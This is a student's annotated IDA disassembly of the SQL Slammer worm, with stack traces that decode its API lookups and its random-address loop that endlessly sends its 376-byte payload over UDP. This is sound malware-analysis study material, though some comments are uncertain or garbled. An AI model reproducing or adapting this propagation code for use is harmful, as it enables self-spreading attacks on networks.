; By Zach James (zjames8@lsu.edu) [dissasm in IDA--> .lst in vim) ; I tried to format it better to fit inside 80 or 100 char width's for printing seg000:00000000 ; seg000:00000000 ; +-------------------------------------------------------------------------+ seg000:00000000 ; | This file was generated by The Interactive Disassembler (IDA) | seg000:00000000 ; | Copyright (c) 2022 Hex-Rays, | seg000:00000000 ; | License info: 48-3051-7114-0E | seg000:00000000 ; | LSU (Louisiana State University), Academic licenses | seg000:00000000 ; +-------------------------------------------------------------------------+ seg000:00000000 ; seg000:00000000 ; Input SHA256 : 61D0096867F96613237F4E76E0D73C67EA81A21F1F0C0DA735B65D1D5562B3D2 seg000:00000000 ; Input MD5 : AB4234A07E53EDB78299A938C4300FC2 seg000:00000000 ; Input CRC32 : 16D72AA9 seg000:00000000 seg000:00000000 ; File Name : C:\Users\golden\Desktop\sqlslammer-sample seg000:00000000 ; Format : Binary file seg000:00000000 ; Base Address: 0000h Range: 0000h - 01B2h Loaded length: 01B2h seg000:00000000 seg000:00000000 .686p seg000:00000000 .mmx seg000:00000000 .model flat seg000:00000000 ; =========================================================================== seg000:00000000 seg000:00000000 ; Segment type: Pure code seg000:00000000 seg000 segment byte public 'CODE' use32 seg000:00000000 assume cs:seg000 seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing ; ignore everyting before this (deleted 00-74) seg000:00000075 ; --------------------------------------------------------------------------- seg000:00000075 nop seg000:00000076 nop seg000:00000077 nop seg000:00000078 nop seg000:00000079 nop seg000:0000007A nop seg000:0000007B nop seg000:0000007C nop ; NOTE: let S := 'stack', it grows leftwards, #:= what was in stack before we started ; BUILDING THE STACK (setup); seg000:0000007D push 42B0C9DCh ; S:[esp>42B0C9DCh|#] seg000:00000082 mov eax, 1010101h ; filler value or what? seg000:00000087 xor ecx, ecx ; zero-out ecx seg000:00000089 mov cl, 18h ; 18h ~ 24 (something will loop 24 times?) ; ecx := [00...18h] seg000:0000008B seg000:0000008B loc_8B: ; CODE XREF: seg000:0000008C↓j seg000:0000008B push eax ; S:[esp|1010101h|42B0C9DCh|#] seg000:0000008C loop loc_8B ; --> loc_8B until (rcx/ecx/cx == 0) ;S:[esp>(1010101h)^24|42B0C9DCh|#] + ecx := 0..0 seg000:0000008E xor eax, 5010101h ; eax := XOR(1 010101h,5 010101h)= ;xor(5~0101..,0001..)=0100..=4 000000h seg000:00000093 push eax ; S:[esp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:00000094 mov ebp, esp ; ebp := esp (stack ptr of the location... ;used to reference the entire program... ; in compilers, used for setting stack ; frames (and then when you are done, ; you just forget what you were doing); seg000:00000096 push ecx ; S:[esp>0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:00000097 push 6C6C642Eh ; S:[esp>6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:0000009C push 32336C65h ; S:[esp>32336C65h|6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:000000A1 push 6E72656Bh ; S:[esp>6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:000000A6 push ecx ; S:[esp>0h|6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:000000A7 push 746E756Fh ; S:[esp>746E756Fh|0h|6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:000000AC push 436B6369h ; S:[esp>436B6369h|746E756Fh|0h|6E72656Bh|32336C65h|6C6C642Eh|0h|... ; ...ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:000000B1 push 54746547h ; S:[esp>54746547h|436B6369h|746E756Fh|0h|6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|... ; ...(1010101h)^24|42B0C9DCh|#] seg000:000000B6 mov cx, 6C6Ch ; ecx := 000[6C6C]h seg000:000000BA push ecx ; S:[esp>0006C6Ch|54746547h|436B6369h|746E756Fh|0h|6E72656Bh|32336C65h|6C6C642Eh|0h|... ; ...ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:000000BB push 642E3233h ; S:[esp>642E3233h|0006C6Ch|54746547h|436B6369h|746E756Fh|0h|6E72656Bh|32336C65h|6C6C642Eh|.. ; ...0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:000000C0 push 5F327377h ; S:[esp>5F327377h|642E3233h|0006C6Ch|54746547h|436B6369h|746E756Fh|0h|6E72656Bh|32336C65h... ; ...|6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:000000C5 mov cx, 7465h ; ecx := 000[7465]h seg000:000000C9 push ecx ; S:[esp>0007465h|5F327377h|642E3233h|0006C6Ch|54746547h|436B6369h|746E756Fh|0h|6E72656Bh... ; ...|32336C65h|6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:000000CA push 6B636F73h ; S:[esp>6B636F73h|0007465h|5F327377h|642E3233h|0006C6Ch|54746547h|436B6369h|746E756Fh|0h... ; ...|6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:000000CF mov cx, 6F74h ; ecx := 000[6F74]h seg000:000000D3 push ecx ; S:[esp>0006F74h|6B636F73h|0007465h|5F327377h|642E3233h|0006C6Ch|54746547h|436B6369h|... ; ...746E756Fh|0h|6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:000000D4 push 646E6573h ; S:[esp>646E6573h|0006F74h|6B636F73h|0007465h|5F327377h|642E3233h|0006C6Ch|54746547h|... ; ...436B6369h|746E756Fh|0h|6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|... ; ...(1010101h)^24|42B0C9DCh|#] seg000:000000D9 mov esi, 42AE1018h ; grabs LoadLibraryA (see below snippet) ;.idata:42AE1018 ; HMODULE (__stdcall *LoadLibraryA)(LPCSTR lpLibFileName) ;.idata:42AE1018 extrn LoadLibraryA:dword ;.idata:42AE1018 ; CODE XREF: sqlsort_8+17E↓p ;.idata:42AE1018 ; DATA XREF: sqlsort_8+17E↓r seg000:000000DE lea eax, [ebp-2Ch] ; ebp-2ch~ebp-(2*16+12=44), ; 44/4====11 (jumps) == [5F327377h] ; S:[esp>646E6573h|0006F74h|6B636F73h|0007465h|(ebp-2Ch)>5F327377h|642E3233h|0006C6Ch|... ; ...54746547h|436B6369h|746E756Fh|0h|6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|... ; (1010101h)^24|42B0C9DCh|#] seg000:000000E1 push eax ; S:[esp>&(ebp-2Ch)|646E6573h|0006F74h|6B636F73h|0007465h|(ebp-2Ch)>5F327377h|642E3233h|... ; 0006C6Ch|54746547h|436B6369h|746E756Fh|0h|6E72656Bh|32336C65h|6C6C642Eh|0h|... ; ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:000000E2 call dword ptr [esi] ; LoadLibraryA("ws2_32.dll\0\0") ; eax := LoadLibraryA(ebp-2Ch+{0,4,8}h--> 5F327377h|642E3233h|0006C6Ch ) = ; ; 5F327377h====77h~'w' 73h~'s' 32h~'2' 5Fh~'_' == "ws2_" ; 642E3233h==== 33h~'3' 32h~'2' 2Eh~'.' 64h~'d'== "32.d ; 00006C6Ch==== 6Ch~'l' 6Ch~'l' 00h~'\0' 00h~'\0' (\0\0 is null termination) ; ==> "ws2_32.dll\0\0" call... how we get it as the argument above ; S:[esp>646E6573h|0006F74h|6B636F73h|0007465h|(ebp-2Ch)>5F327377h|642E3233h|0006C6Ch|... ; 54746547h|436B6369h|746E756Fh|0h|6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|... ; (1010101h)^24|42B0C9DCh|#] seg000:000000E4 push eax ; S:[esp>HMODULE~ws2_32.dll|646E6573h|0006F74h|6B636F73h|0007465h|(ebp-2Ch)>5F327377h|... ; 642E3233h|0006C6Ch|54746547h|436B6369h|746E756Fh|0h|6E72656Bh|32336C65h|6C6C642Eh|0h|... ; ...ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:000000E5 lea eax, [ebp-20h]; 20h~32/4=8 'jumps left' from ebp seg000:000000E8 push eax ; S:[esp>&(ebp-20h)|HMODULE~ws2_32.dll|646E6573h|0006F74h|6B636F73h|0007465h|... ; ...(ebp-2Ch)>5F327377h|642E3233h|0006C6Ch|(ebp-20h)>54746547h|436B6369h|746E756Fh|0h|... ; 6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] ; (gldn: 'load address of kernel32.dll --> eax'); me: 10h~16/4=4 'jumps left' seg000:000000E9 lea eax, [ebp-10h] seg000:000000EC push eax ; S:[esp>&(ebp-10h)|&(ebp-20h)|HMODULE~ws2_32.dll|646E6573h|0006F74h|6B636F73h|0007465h|... ; (ebp-2Ch)>5F327377h|642E3233h|0006C6Ch|(ebp-20h)>54746547h|436B6369h|746E756Fh|0h|... ; (ebp-10h)>6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] ; LoadLibraryA( (ebp-10h)>6E72656Bh|32336C65h|6C6C642Eh|0h) = LoadLibraryA("kernel32.dll\0\0") seg000:000000ED call dword ptr [esi] ; 6E(n) 72(r) 65(e) 6Bh(k) == 'kern' ; 32(2) 33(3) 6C(l) 65h(e) == 'el32' ; 6C(l) 6C(l) 64(d) 2Eh(.) == '.dll' ; 0h ~ 00h 00h == '\0\0' --> null termination (ignore rest:) 00h 00h seg000:000000EF push eax ; S:[esp>HMODULE~kernel32.dll|&(ebp-20h)|HMODULE~ws2_32.dll|646E6573h|0006F74h|6B636F73h|... ; ...0007465h|(ebt string lives at ebp-20h and you'll see why.p-2Ch)>5F327377h|642E3233h|... ; ...0006C6Ch|(ebp-20h)>54746547h|436B6369h|746E756Fh|0h|6E72656Bh|32336C65h|6C6C642Eh|0h|... ; ...ebp>4000000h|(1010101h)^24|42B0C9DCh|#] ; also, &(ebp-20h) ~ 54746547h|436B6369h|746E756Fh|0h| ==== "GetTickCount" (still on stack) seg000:000000F0 mov esi, 42AE1010h ; looks familiar (sqlsort.dll snippet below) ;.idata:42AE1010 ; FARPROC (__stdcall *GetProcAddress)(HMODULE hModule, LPCSTR lpProcName) ;.idata:42AE1010 extrn GetProcAddress:dword ;.idata:42AE1010 ; CODE XREF: sqlsort_8+18C↓p ;.idata:42AE1010 ; DATA XREF: sqlsort_8+18C↓r ; ??? i need to understand this more ??? ; ebx>GetProcAddress(HMODULE hModule_from_stack :), lpcstr to address ref like other call) seg000:000000F5 mov ebx, [esi] seg000:000000F7 mov eax, [ebx] ; eax> return of ProcAddress ? ;gldn_NOTE: in exploits, small errors can completely tank the exploit ; is this the first version of the library call ??? ; ie try both versions of the library call seg000:000000F9 cmp eax, 51EC8B55h ; ~ 55 8B EC 51 ; ~ "push ebp; mov ebp, esp; push ecx" ie just checks teh std part of a 'normal' GetProcAddress fn ; if the right version, go and jump over and use this version of GetProc... seg000:000000FE jz short loc_105 seg000:00000100 mov esi, 42AE101Ch ;ELSE mv to default/legacy one seg000:00000105 seg000:00000105 loc_105: ; CODE XREF: seg000:000000FE↑j ; S:[esp>HMODULE~kernel32.dll|&(ebp-20h)|HMODULE~ws2_32.dll|646E6573h|0006F74h|6B636F73h|... ; ...0007465h|(ebt string lives at ebp-20h and you'll see why.p-2Ch)>5F327377h|642E3233h|... ; ...0006C6Ch|(ebp-20h)>54746547h|436B6369h|746E756Fh|0h|6E72656Bh|32336C65h|6C6C642Eh|0h|... ; ebp>4000000h|(1010101h)^24|42B0C9DCh|#] ; GetProcAddress(HMODULE kernel32.dll, lpcstr--> ebp-20h~"GetTickCount") ; === GetProcAddress(kernel32.dll, GetTickCount) =: eax (FARPROC) seg000:00000105 call dword ptr [esi] ; S:[esp>HMODULE~kernel32.dll|&(ebp-20h)|HMODULE~ws2_32.dll|646E6573h|0006F74h|6B636F73h|... ; ...0007465h|(ebp-2Ch)>5F327377h|642E3233h|0006C6Ch|(ebp-20h)>54746547h|436B6369h|746E756Fh|... ; ...0h|6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] ; calls the FARPROC (ie GetTickCount) ie eax := # of milliseconds since boot ie eax = tick_ct seg000:00000107 call eax ; S:[esp>HMODULE~ws2_32.dll|646E6573h|0006F74h|6B636F73h|0007465h|(ebp-2Ch)>5F327377h|... ; ...642E3233h|0006C6Ch|(ebp-20h)>54746547h|436B6369h|746E756Fh|0h|6E72656Bh|32336C65h|... ; 6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:00000109 xor ecx, ecx ; zero-out ecx seg000:0000010B push ecx ; S:[esp>0h|HMODULE~ws2_32.dll|646E6573h|0006F74h|6B636F73h|0007465h|(ebp-2Ch)>5F327377h|... ; ...642E3233h|0006C6Ch|(ebp-20h)>54746547h|436B6369h|746E756Fh|0h|6E72656Bh|32336C65h|6C6C642Eh| ; ...0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:0000010C push ecx ; pushes 0 ; S:[esp>0h|0h|HMODULE~ws2_32.dll|646E6573h|0006F74h|6B636F73h|0007465h|(ebp-2Ch)>5F327377h|... ; ...642E3233h|0006C6Ch|(ebp-20h)>54746547h|436B6369h|746E756Fh|0h|6E72656Bh|32336C65h|... ; ...6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:0000010D push eax ; pushes tick_ct ; S:[esp>tick_ct|0h|0h|HMODULE~ws2_32.dll|646E6573h|0006F74h|6B636F73h|0007465h|... ; ...(ebp-2Ch)>5F327377h|642E3233h|0006C6Ch|(ebp-20h)>54746547h|436B6369h|746E756Fh|0h|... ; ...6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:0000010E xor ecx, 9B040103h ; xor 0, 9B040103h--> ecx := 9B040103h seg000:00000114 xor ecx, 1010101h ; xor 01010101=> ecx := 9A050002h seg000:0000011A push ecx ; S:[esp>9A050002h|tick_ct|0h|0h|HMODULE~ws2_32.dll|646E6573h|0006F74h|6B636F73h|0007465h|... ; ...(ebp-2Ch)>5F327377h|642E3233h|0006C6Ch|(ebp-20h)>54746547h|436B6369h|746E756Fh|0h|... ; ...6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:0000011B lea eax, [ebp-34h] ; (34h~16*3 + 4)/4=13 'jumps' seg000:0000011E push eax ; S:[esp>&(ebp-34h)|9A050002h|tick_ct|0h|0h|HMODULE~ws2_32.dll|646E6573h|0006F74h|... ; (ebp-34h)>6B636F73h|0007465h|(ebp-2Ch)>5F327377h|642E3233h|0006C6Ch|(ebp-20h)>54746547h|... ; .436B6369h|746E756Fh|0h|6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:0000011F mov eax, [ebp-40h] ; 40h~64/4=16jmps eax := HMODULE~ws2_32.dll| seg000:00000122 push eax ; S:[esp>HMODULE~ws2_32.dll|&(ebp-34h)|9A050002h|tick_ct|0h|0h|HMODULE~ws2_32.dll|646E6573h... ; |0006F74h|(ebp-34h)>6B636F73h|0007465h|(ebp-2Ch)>5F327377h|642E3233h|0006C6Ch|... ; (ebp-20h)>54746547h|436B6369h|746E756Fh|0h|6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|... ; (1010101h)^24|42B0C9DCh|#] ; GetProcAddress(HMODULE=ws2_32.dll, ptr=&(ebp-34h)=6B636F73h|0007465h = 'socket\0\0') ; ==> eax = ptr to socket() (FARPROC) seg000:00000123 call dword ptr [esi] ; S:[esp>9A050002h|tick_ct|0h|0h|HMODULE~ws2_32.dll|646E6573h|0006F74h|(ebp-34h)>6B636F73h|... ; 0007465h|(ebp-2Ch)>5F327377h|642E3233h|0006C6Ch|(ebp-20h)>54746547h|436B6369h|746E756Fh|... ; 0h|6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:00000125 push 11h ; S:[esp>11h|9A050002h|tick_ct|0h|0h|HMODULE~ws2_32.dll|646E6573h|0006F74h|... ; (ebp-34h)>6B636F73h|0007465h|(ebp-2Ch)>5F327377h|642E3233h|0006C6Ch|(ebp-20h)>54746547h... ; |436B6369h|746E756Fh|0h|6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:00000127 push 2 ; S:[esp>2|llh|9A050002h|tick_ct|0h|0h|HMODULE~ws2_32.dll|646E6573h|0006F74h|... ; (ebp-34h)>6B636F73h|0007465h|(ebp-2Ch)>5F327377h|642E3233h|0006C6Ch|(ebp-20h)>54746547h|... ; 436B6369h|746E756Fh|0h|6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:00000129 push 2 ; S:[esp>2|2|llh|9A050002h|tick_ct|0h|0h|HMODULE~ws2_32.dll|646E6573h|0006F74h|... ; (ebp-34h)>6B636F73h|0007465h|(ebp-2Ch)>5F327377h|642E3233h|0006C6Ch|(ebp-20h)>54746547h|... ; 436B6369h|746E756Fh|0h|6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] ; UDP socket descriptor in eax seg000:0000012B call eax ; socket(AF_INET=2,SOCK_DGRAM=2,IPPROTO_UDP=11h) seg000:0000012D push eax ; S:[esp>udp_sock_descriptor|9A050002h|tick_ct|0h|0h|HMODULE~ws2_32.dll|646E6573h|0006F74h|... ; ...(ebp-34h)>6B636F73h|0007465h|(ebp-2Ch)>5F327377h|642E3233h|0006C6Ch|(ebp-20h)>54746547h... ; .|436B6369h|746E756Fh|0h|6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:0000012E lea eax, [ebp-3Ch] ; S:[esp>udp_sock_descriptor|9A050002h|tick_ct|0h|0h|HMODULE~ws2_32.dll|(ebp-3ch)>646E6573h|... ;... 0006F74h|(ebp-34h)>6B636F73h|0007465h|(ebp-2Ch)>5F327377h|642E3233h|0006C6Ch|... ; ...(ebp-20h)>54746547h|436B6369h|746E756Fh|0h|6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|.. ; ...(1010101h)^24|42B0C9DCh|#] seg000:00000131 push eax ; S:[esp>&(ebp-3Ch)|udp_sock_descriptor|9A050002h|tick_ct|0h|0h|(ebp-40h)>HMODULE~ws2_32.dll|... ; (ebp-3ch)>646E6573h|0006F74h|(ebp-34h)>6B636F73h|0007465h|(ebp-2Ch)>5F327377h|642E3233h|... ; 0006C6Ch|(ebp-20h)>54746547h|436B6369h|746E756Fh|0h|6E72656Bh|32336C65h|6C6C642Eh|0h|... ; ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:00000132 mov eax, [ebp-40h] seg000:00000135 push eax ; S:[esp>HMODULE~ws2_32.dll|&(ebp-3Ch)|udp_sock_descriptor|9A050002h|tick_ct|0h|0h|... ; ...(ebp-40h)>HMODULE~ws2_32.dll|(ebp-3ch)>646E6573h|0006F74h|(ebp-34h)>6B636F73h|0007465h|... ; ...(ebp-2Ch)>5F327377h|642E3233h|0006C6Ch|(ebp-20h)>54746547h|436B6369h|746E756Fh|0h|... ; ...6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] ; GetProcAddress(HMODULE=ws2_32.dll, ptr=#ebp-3Ch = 646E6573h|0006F74h = "sendto\0\0") ; ie call esi = sendto() seg000:00000136 call dword ptr [esi] ; ; S:[esp>udp_sock_descriptor|9A050002h|tick_ct|0h|0h|... ; ...(ebp-40h)>HMODULE~ws2_32.dll|(ebp-3ch)>646E6573h|0006F74h|(ebp-34h)>6B636F73h|0007465h|... ; ...(ebp-2Ch)>5F327377h|642E3233h|0006C6Ch|(ebp-20h)>54746547h|436B6369h|746E756Fh|0h|... ; ...6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:00000138 mov esi, eax ; replace GetProcAddress() w/ sendto() ? ; before this , (@seg000:000000F5), ebx := GetProcAddress (ptr) ??? seg000:0000013A or ebx, ebx ; set ZF ???? ; GetProcAddress_absolute?? ^ 0FFD9613Ch seg000:0000013C xor ebx, 0FFD9613Ch ; ???? NO IDEA seg000:00000142 seg000:00000142 loc_142: ; CODE XREF: seg000:00000176↓j seg000:00000142 mov eax, [ebp-4Ch] ; eax:= tick_ct @ time recored earlier ; recall: lea ("load eff. addr") destination, [base + index * scale] (no mem access.. seg000:00000145 lea ecx, [eax+eax*2] ; ecx := eax * 3 seg000:00000148 lea edx, [eax+ecx*4] ; edx := eax + ecx*4 seg000:0000014B shl edx, 4 ; edx *= 2^4 == (eax + ecx*4) * 2^4 seg000:0000014E add edx, eax ; ((eax + ecx*4) * 2^4) + eax seg000:00000150 shl edx, 8 ; (((eax + ecx*4) * 2^4) + eax) * 2^8 seg000:00000153 sub edx, eax ; ((((eax + ecx*4) * 2^4) + eax) * 2^8) - eax seg000:00000155 lea eax, [eax+edx*4] ; eax := tick_ct + {((((eax + ecx*4) * 2^4) + eax) * 2^8) - eax} * 4 seg000:00000158 add eax, ebx ; eax seg000:0000015A mov [ebp-4Ch], eax ; ticket_ct = eax ~ saving/resetting eax... seg000:0000015D push 10h ; ~16 ; S:[esp>10h|udp_sock_descriptor|9A050002h|tick_ct|0h|0h|... ; ...(ebp-40h)>HMODULE~ws2_32.dll|(ebp-3ch)>646E6573h|0006F74h|(ebp-34h)>6B636F73h|0007465h|... ; ...(ebp-2Ch)>5F327377h|642E3233h|0006C6Ch|(ebp-20h)>54746547h|436B6369h|746E756Fh|0h|... ; ...6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] ; likely 10h is a parameter / an argument for this further call on esi ... seg000:0000015F lea eax, [ebp-50h] ; 16*5=80/4=20 'steps' -> 9A050002h| ; 9A 05 00 02h seg000:00000162 push eax ;S:[esp>&(ebp-50h)|10h|udp_sock_descriptor|(ebp-50h)>9A050002h|tick_ct|0h|0h|... ; ...(ebp-40h)>HMODULE~ws2_32.dll|(ebp-3ch)>646E6573h|0006F74h|(ebp-34h)>6B636F73h|0007465h|... ; ...(ebp-2Ch)>5F327377h|642E3233h|0006C6Ch|(ebp-20h)>54746547h|436B6369h|746E756Fh|0h|... ; ...6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:00000163 xor ecx, ecx ; zero-out ecx (ie cx(16 bits) === 0 here) seg000:00000165 push ecx ; push ecx (00s... ie flags=0) ;S:[esp>0h|&(ebp-50h)|10h|udp_sock_descriptor|(ebp-50h)>9A050002h|tick_ct|0h|0h|... ; ...(ebp-40h)>HMODULE~ws2_32.dll|(ebp-3ch)>646E6573h|0006F74h|(ebp-34h)>6B636F73h|0007465h|... ; ...(ebp-2Ch)>5F327377h|642E3233h|0006C6Ch|(ebp-20h)>54746547h|436B6369h|746E756Fh|0h|... ; ...6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:00000166 xor cx, 178h ; cx := 376 (size of payload ???) ; seg000:00000000-176h <= 178h ==> size of payload is 376 seg000:0000016B push ecx ;S:[esp>178h|0h|&(ebp-50h)|10h|udp_sock_descriptor|(ebp-50h)>9A050002h|tick_ct|0h|0h|... ; ...(ebp-40h)>HMODULE~ws2_32.dll|(ebp-3ch)>646E6573h|0006F74h|(ebp-34h)>6B636F73h|0007465h|... ; ...(ebp-2Ch)>5F327377h|642E3233h|0006C6Ch|(ebp-20h)>54746547h|436B6369h|746E756Fh|0h|... ; ...6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:0000016C lea eax, [ebp+3] ; sends the worm across the internet later seg000:0000016F push eax ;S:[esp>&(ebp+3)|178h|0h|&(ebp-50h)|10h|udp_sock_descriptor|(ebp-50h)>9A050002h|tick_ct|0h|0h|... ; ...(ebp-40h)>HMODULE~ws2_32.dll|(ebp-3ch)>646E6573h|0006F74h|(ebp-34h)>6B636F73h|0007465h|... ; ...(ebp-2Ch)>5F327377h|642E3233h|0006C6Ch|(ebp-20h)>54746547h|436B6369h|746E756Fh|0h|... ; ...6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:00000170 mov eax, [ebp-54h] seg000:00000173 push eax ;S:[esp>udp_socket_descriptor|&(ebp+3)|178h|0h|&(ebp-50h)|10h|udp_sock_descriptor|(ebp-50h)>9A050002h|... ; tick_ct|0h|0h|... ; ...(ebp-40h)>HMODULE~ws2_32.dll|(ebp-3ch)>646E6573h|0006F74h|(ebp-34h)>6B636F73h|0007465h|... ; ...(ebp-2Ch)>5F327377h|642E3233h|0006C6Ch|(ebp-20h)>54746547h|436B6369h|746E756Fh|0h|... ; ...6E72656Bh|32336C65h|6C6C642Eh|0h|ebp>4000000h|(1010101h)^24|42B0C9DCh|#] seg000:00000174 call esi ; calling sendto()... see below ;#include ;ssize_t sendto(int socket, const void *message, size_t length, ; int flags, const struct sockaddr *dest_addr, ; socklen_t dest_len); ; sendto(udp_socket_descriptor~[ebp-54h], &(ebp+3), 178h~376, 0 flags, &(edp-50h), 10h~16) seg000:00000176 jmp short loc_142 ; everything after this is junk